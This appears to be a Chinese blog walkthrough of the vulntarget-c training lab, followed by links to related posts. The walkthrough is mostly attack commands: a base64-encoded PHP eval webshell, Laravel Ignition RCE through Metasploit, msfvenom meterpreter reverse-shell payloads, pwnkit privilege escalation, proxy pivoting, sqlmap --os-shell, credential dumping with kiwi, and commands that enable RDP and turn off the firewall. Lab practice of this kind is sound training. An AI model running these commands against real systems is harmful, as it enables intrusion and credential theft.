vulntarget-c靶场内网渗透

原创 已于 2025-09-17 19:03:50 修改 · 404 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

于 2025-09-17 19:00:34 首次发布

1. 环境搭建

2.对ubuntu20的渗透

 对其进行端口扫描

访问80端口

发现是laravel框架。版本是v8.78.1

使用 kaili 自带的msf 进行渗透

search laravel

use exploit/multi/php/ignition_laravel_debug_rce

执行利用完成检测

上传木马

先将木马进行base64编码

<?php @eval($_POST[1]); ?>
PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4=

上传

echo "PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4="|base64 -d >shell.php

访问看是否成功

使用蚁剑连接

使用msf上线

生成msf木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.6.45 LPORT=4444 -f elf -o /home/kali/Desktop/ttt.elf

将木马放入Ubuntu20的webshell中

msf设置监听

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
show options 
exploit

进行提权

使用msf自带工具,收集可以用于提权的模块

run post/multi/recon/local_exploit_suggester

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set session
exploit

添加代理

建立路由

run autoroute -p     #查看路由信息
run post/multi/manage/autoroute  #⾃动添加路由

添加socks代理

use auxiliary/server/socks_proxy

信息收集

ip a

上传fscan 进行扫描

upload /home/kali/Desktop/fscan.exe /tmp

./fscan -h 10.0.20.0/24 -np -no -nopoc

3.内网机器渗透

发现主机:10.0.20.100,开放有80端口

登录后台,尝试弱口令,admin/admin123

发现sql注入

sqlmap检测

proxychains sqlmap -u "http://10.0.20.100/admin/?page=appointments/view_details&id=6" -p id --batch

使用sqlmap获取shell

绝对路径

proxychains sqlmap -u "http://10.0.20.100/admin/?page=appointments/view_details&id=6" -p id --os-shell

写入webshell

msf上线

使用免杀

生成msf木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.20.141 LPORT=4444 -f py -o shellcode_64.py

设置监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.0.20.141
run

信息收集

arp -a

发现10.0.10.100

利用kiwi模块抓取hash

load kiwi
creds_all

解密:https://www.somd5.com/

rdp连接

开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭防火墙

netsh advfirewall set allprofiles state off

远程连接

4. 第二层内网渗透

查找到账号密码

用户:vulntarget
密码:vuln@qwe

利用sudo提权

sudo -l     
sudo su

安全beginner
关注
Vulntarget-b靶场渗透WP
Fear1e4的博客
06-13 681
nmap端口探测网页访问端口目录扫描网页直接登陆报错404。访问admin.php,有后台管理系统登陆页。bp弱口令爆破admin123,版本1.8.1,查漏洞。
打穿内网Vulntarget-a靶场实战记录
tpaer的博客
11-11 2806
内容包括:通达OA未授权上传+文件包含RCE、Redis未授权写马、ms17-010永恒之蓝、代理转发内网跳板、CVE-2020-1472 域控杀器Zerologon、wmiexec/smbexec横向移动、cobalt strike与msf的shell传递
VulnTarget-c
大熊
06-16 856
实验目标:拿取Ubuntu 16主机的Flag信息学习目标:Laravel/OVAS-PHP漏洞/隧道代理/免杀/提权/CVE-2021-3129/CVE-2021-3493等靶机下载:其中vulntarget-c为本次实验机器》》》靶机信息《《《
Vulntarget靶场渗透笔记[持续更新中]
派大星的博客
04-08 8819
Vulntarget靶场渗透笔记 文章目录Vulntarget靶场渗透笔记靶场官方链接Vulntarget-aWriteup网络拓扑环境信息收集win7 MSF上线横向移动win2016cs上线msf上线域渗透域内提权 靶场官方链接 https://github.com/crow821/vulntarget Vulntarget-a Writeup vulntarget漏洞靶场系列(一) 渗透测试练习No.62 内网渗透 vulntarget-a Win7:win7/admin win2016:Admini
[vulntarget靶场] vulntarget-c
qq_43884092的博客
09-25 719
Laravel远程代码执行CVE-2021-3129,后台sql注入getshell,查看MobaXterm已存储的账号密码,sudo提权
vulntarget】系列:vulntarget-c 练习WP
一只爱吃橙子的羊
07-16 1343
vulntarget】系列:vulntarget-c 练习WP
乌鸦安全2021年度文章合集
crowsec
02-09 1446
乌鸦安全精选原创文章合集,基本上大部分都是原创,当然还有一部分文章由其他师傅投稿提供,在此感谢各位师傅的投稿和帮助!
内网渗透vulntarget-a 多层域控靶场
weixin_68408599的博客
12-22 2976
网络拓扑图如下这里我们本次渗透测试,外网Win7IP地址为192.168.127.91靶机信息:靶机用户名密码Windows 7win7adminAdmin@123Admin#123Admin@666靶机下载地址:https://github.com/crow821/vulntarget这个靶场是我第一个搭建在本地上的靶场,虽然中路有很多挫折,比如在前期配置外网网卡时候,发现DHCP一直分配不上ip地址,一直是168.254.X.X,好在后面及时发现问题,发现网卡设置错了。
vulntarget-a靶场的学习思考
weixin_48421613的博客
03-21 7028
前言: 最近玩了一下crow大表哥的靶场,觉得靶场打过之后确实是能用到很多技巧和知识,所以在这里做一些个人的学习总结,文章和靶场适合新人,因为不用做免杀,也可以让人初步的了解一下域环境 靶场由星期五实验室与乌鸦安全共同维护,GIthub可自行下载,Github原文链接以及原过程链接如下 https://github.com/crow821/vulntarget. https://mp.weixin.qq.com/s/uxwbnVOxkR8OBkkY9WW6aQ. 靶场下载地址如下 链接: ht
vulntarget漏洞靶场系列-vulntarget-d
m0_63138919的博客
08-29 782
vulntarget漏洞靶场系列-vulntarget-d 题解
渗透靶场——vulntarget-a(完整版)
tlovejr的博客
03-25 6475
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
渗透靶场——vulntarget-d综合靶场
tlovejr的博客
04-01 3100
部署环境 此次靶场共两个个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 信息收集 扫描主机 扫描同一网段中的存活主机 发现存活主机ip地址(其他ip是我其他机器的ip地址) 192.168.1.17 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.17 发现开放了80、81、3306、8888,看这架势应该是宝塔的界面,那就先访问端口看看 访问80端口发现不可 web渗透 访问81端口 在这里发现了一个骑士的cms框架界面 看到底下的版本信息,搜索
基于微信小程序的公益捐赠安全平台9hp4t247 包含完整开发套件(程序、源码、数据库、调试部署方案及开发环境)系统界面展示及获取方式置于文档末尾,可供参考。
2509_93102599的博客
10-20 964
研究意义 理论价值:构建"信息安全-信任机制-行为激励"三维理论模型,填补公益捐赠安全领域理论空白; 实践价值: 对捐赠者:采用国密SM4算法加密数据,泄露风险降低92%; 对受助方:区块链技术实现物资流转全链追溯,误差率<0.3%; 对行业:建立项目星级评价体系,虚假项目识别准确率达98.7%。
Linux小课堂: SSH协议之安全远程连接的核心技术原理与实现
Wang的专栏
10-22 933
文章摘要 远程终端连接是现代计算的核心技术,通过SSH等安全协议实现跨地域设备控制。相比明文的Telnet,SSH采用混合加密模型(非对称加密密钥交换+对称加密数据传输),确保通信安全。典型应用场景包括服务器运维、远程开发等,使管理员无需亲临机房即可管理全球分布的设备。服务器作为24小时运行的服务节点,需保证持续在线。文中还提供了基于NestJS的SSH客户端实现示例,展示如何安全执行远程命令。该技术极大提升了工作效率,是互联网基础设施的重要组成部分。
合合信息亮相PRCV:多模态文本智能与内容安全双擎驱动的技术突破与实践解析
2501_92808811的博客
10-22 613
合合信息的方案首先通过CV模型定位图片中的文字区域(如用户发布的广告图中的宣传语),再通过OCR提取文字后,利用多模态模型判断图文关联性(如图片为儿童玩具,但文字包含“成人用品促销”这类矛盾内容),最后结合内容安全模型的敏感实体识别(如违禁药品名称)与情感分析(如煽动性词汇密度)输出拦截建议。例如,一张包含文字的发票图片(图像模态),需要先通过OCR(光学字符识别)提取文字(文本模态),再结合发票模板规则(结构化知识)与业务上下文(如报销政策)进行语义分析(文本推理)。合合信息的技术突破在于:通过。
【江苏政务服务网-注册_登录安全分析报告】
最新发布
10-24 618
当前网站注册入口面临严重安全风险,包括暴力破解、短信盗刷等问题。江苏政务服务网采用传统图形验证码(4位英文数字组合),但OCR识别率高达95%以上。通过模拟器+OCR技术可轻松破解验证码系统,存在显著安全隐患。测试代码显示,攻击者能利用自动化工具完成手机号输入、验证码识别、短信获取等全流程操作。这表明传统验证码已难以应对现代技术攻击,亟需升级更安全的验证机制。
大数据平台安全指南——大数据平台安全架构全景:从认证授权到数据治理的企业级实践指南——认证、授权、审计、加密四大支柱
初始阶段。长文本博客做模型上下文。新书《千界明彻录》(故事形式构建元思维)——胡说小说。更多思辨内容在公众号。
10-15 1287
本文系统阐述大数据平台安全架构,围绕认证、授权、审计、加密四大支柱展开。详解Kerberos认证机制、Apache Ranger权限管理、Hadoop加密方案及密钥管理体系。涵盖数据湖治理(Lake Formation、Delta Lake)、流式数据安全(Kafka、Flink)、数据血缘追踪(Atlas、DataHub)及监控审计实践。强调分层防护、最小权限原则与合规要求,提供从基础设施到应用层的完整安全解决方案。
仓颉语言核心特性深度解析:类型系统与内存安全实践
2302_80663569的博客
10-23 534
本文深入解析仓颉语言的核心特性,重点探讨其类型系统与内存安全机制。仓颉采用强静态类型系统,支持类型推导、空安全、不可变优先等特性,通过智能的编译器检查确保代码安全。内存安全方面实现了所有权系统、借用机制和生命周期管理三位一体的保护,在编译期杜绝空指针、内存泄漏和数据竞争等问题。文章还对比了Rust等现代语言,展示了仓颉在鸿蒙生态中的独特优势,包括更简化的所有权模型和零成本抽象。通过丰富的代码示例,系统介绍了类型推导、值/引用类型选择、Option模式匹配等实用技术,为开发者提供了性能与安全并重的编程实践指南
应急响应-vulntarget-j-02
04-01
<think>好的,我需要帮助用户查找关于应急响应 vulntarget 配置 j-02 的相关信息。首先,用户提到的vulntarget系列似乎是用于模拟勒索病毒攻击的应急响应靶场环境,例如引用[1]中提到的vulntarget-n,引用[3]提到的vulntarget-k-03。但用户询问的是j-02,这可能在现有的引用中没有直接提到。 接下来,我需要检查现有的三个引用内容是否有任何与j-02相关的线索。引用[1]主要描述vulntarget-n的案例,涉及阿里云环境被勒索攻击的情况。引用[2]讨论了应急响应中的数据库和漏洞口令检索,以及工具箱的重要性,但没有具体提到j-02。引用[3]提到了vulntarget-k-03,分析了通过日志定位攻击时间的方法。 由于现有引用中没有明确提到j-02,可能需要根据vulntarget系列的一般特征来推断。例如,vulntarget靶场通常模拟真实攻击场景,包含被加密的文件、日志分析、入侵痕迹排查等。配置j-02可能涉及类似的组件,比如Web应用漏洞、SSH或Redis服务的配置问题,如引用[3]中提到的.ssh和redis.log分析。 此外,用户可能需要检查配置文件中的特定漏洞或攻击路径。根据引用[2],第三方应用的安全配置和口令安全是关键点,所以j-02可能涉及弱口令或未修复的漏洞,例如Redis未授权访问,这可能导致攻击者入侵并部署勒索病毒。 总结来说,虽然没有直接的j-02信息,但可以建议用户按照vulntarget系列的通用的应急响应步骤进行排查:检查日志文件(如系统日志、应用日志)、分析异常进程、检查开放端口和服务配置,尤其是涉及数据库或远程访问的服务。同时参考已有的案例方法,比如引用[3]中的时间戳分析,可能帮助定位攻击时间点。 最后,建议用户查阅官方文档或社区资源,获取vulntarget各版本的具体配置信息,或者联系相关平台的支持团队,以确认j-02的具体场景和配置细节。</think>关于**应急响应 vulntarget 配置 J-02**的相关信息,目前公开资料中未直接提及该特定版本的详细配置。但根据现有 vulntarget 系列靶场的设计逻辑和引用内容,可推断以下关键点及排查方向: --- ### 一、vulntarget 系列靶场通用特征 1. **模拟勒索攻击场景** 通常包含被加密的文件(如`.vulntarget`扩展名)、异常进程、日志篡改等痕迹,需通过日志分析、文件恢复、入侵路径追踪进行响应[^1]。 2. **依赖第三方服务漏洞** 如 Redis 未授权访问、SSH 弱口令等,攻击者可能通过此类漏洞植入恶意程序或加密文件[^3]。例如: - 检查 Redis 日志中异常操作时间点:`redis.log`中的`DB loaded from disk`时间戳可定位攻击时间。 - 排查 SSH 登录记录:`.ssh`目录的修改时间与日志中的登录事件关联分析。 3. **应急取证工具箱需求** 需结合自动化工具(如日志分析脚本、内存取证工具)和人工排查,快速定位攻击入口点和影响范围[^2]。 --- ### 二、针对配置 J-02 的可能排查方向 1. **日志文件分析** - 系统日志:`/var/log/auth.log`(SSH 登录记录)、`/var/log/syslog`(服务异常) - 应用日志:Web 服务(如 Apache/Nginx)、数据库(MySQL/Redis)日志中的异常请求或未授权操作。 2. **服务配置检查** - **Redis 配置**:是否启用密码认证、绑定 IP 限制(参考 vulntarget-k-03 的 Redis 漏洞利用场景)。 - **SSH 配置**:是否禁用 root 登录、是否使用强口令(引用[2]提到口令检索的重要性)。 3. **文件系统痕迹** - 查找加密文件(如`.vulntarget`扩展名)及对应的加密进程残留。 - 检查定时任务(`crontab -l`)或启动项中的可疑脚本。 --- ### 三、推荐工具与方法 1. **漏洞扫描与口令爆破检测** 使用工具如 `hydra` 或 `Nmap` 检测开放端口的弱口令风险[^2]。 2. **时间线分析** 通过 `find` 命令结合 `-mtime` 或 `-newermt` 参数,按时间筛选被篡改文件(如引用[3]中通过修改日期定位攻击时间)。 ```bash find / -name "*.vulntarget" -mtime -1 # 查找24小时内被加密的文件 ``` 3. **内存取证** 使用 `Volatility` 分析内存转储,提取恶意进程或网络连接记录。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值